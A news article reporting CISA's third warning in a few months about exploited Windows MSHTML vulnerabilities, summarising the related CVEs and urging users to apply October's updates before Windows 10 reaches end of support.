Here we go again. What was described as a "previously unknown" threat just three months ago has now prompted a third warning from the US government to update or stop using PCs. By exploiting old code buried under the covers of today's Windows systems, it has quickly become clear that "a significant percentage of Windows devices are fully exposed and at risk of being taken over by attackers."
The latest vulnerability is CVE-2024-43573, which the US cyber agency warns is "an unspecified spoofing vulnerability which can lead to a loss of confidentiality." It has mandated all federal employees to "apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable" by October 29. In other words, update your PC within the next ten days, or stop using it until you can.
As ever, while CISA's mandate applies only to federal staff, it's intended "for the benefit of the cybersecurity community and network defenders -- and to help every organization better manage vulnerabilities and keep pace with threat activity." Given this is the third such exploitation of this type of vulnerability in a few weeks, and that the initial fixes clearly didn't complete the job, all are well advised to update right away. "Don't ignore this," Trend Micro warns. "Test and deploy this update quickly."
Timing-wise, the interesting twist with this October warning is the 900 million Windows 10 users yet to move to Windows 11, now just a year away from end-of-life meaning end of support, which will cut off those users from updates such as this. Worse, there are also a reported 50 million Windows users on even older legacy versions of the OS, which means their machines are wide open to these threats.
The "previously unknown" threat that has now driven it's third emergency update warning relates to MSHTML, which -- as Check Point explains -- is a "special Windows Internet Shortcut file, which, when clicked, call the retired Internet Explorer (IE) to visit the attacker-controlled URL... By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim's computer, although the computer is running the modern Windows 10/11 operating system."
The first of these vulnerabilities, CVE-2024-38112, was disclosed in July and linked to infostealer attacks that Trend Micro attributed to APT group Void Banshee. Then in September, CISA added CVE-2024-43461 to its Known Exploited Vulnerability (KEV) catalog, warning it had been exploited "in conjunction with CVE-2024-38112."
Disclosing the second of these MSHTML vulnerabilities, Trend Micro explained that "the specific flaw exists within the way Internet Explorer prompts the user after a file is downloaded. A crafted file name can cause the true file extension to be hidden, misleading the user into believing that the file type is harmless. An attacker can leverage this vulnerability to execute code in the context of the current user."
As for CVE-2024-43573 -- the third MSHTML vulnerability in as many months and actually the fourth this year, with CVE-2024-30040 disclosed in May, Trend Micro says it "is also very similar to the bug patched back in July... There's no word from Microsoft on whether it's the same group, but considering there is no acknowledgment here, it makes us think the original patch was insufficient."
Given that risk, that the original fixes for the MSHTML threat may have been "insufficient," all Windows users should update now, ensuring that October's Patch Tuesday updates are applied. There are clearly multiple active threats in the wild exploiting this "previously unknown" threat, and that will only get worse.
Which also means that if you're already out of support or may find yourself there in October 2025 -- with Windows 10's end-of-life, you should consider your options.